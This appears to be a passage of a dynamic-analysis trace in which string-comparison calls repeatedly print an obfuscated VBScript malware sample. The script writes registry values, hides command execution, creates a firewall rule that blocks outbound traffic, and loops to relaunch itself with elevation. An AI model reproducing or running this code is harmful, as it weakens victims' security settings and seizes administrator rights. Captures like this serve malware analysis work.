bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0223.031] wcsncmp (_String1="ol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0223.031] wcsncmp (_String1="l = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.031] wcsncmp (_String1=" = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.031] wcsncmp (_String1="= PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0223.031] wcsncmp (_String1=" PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 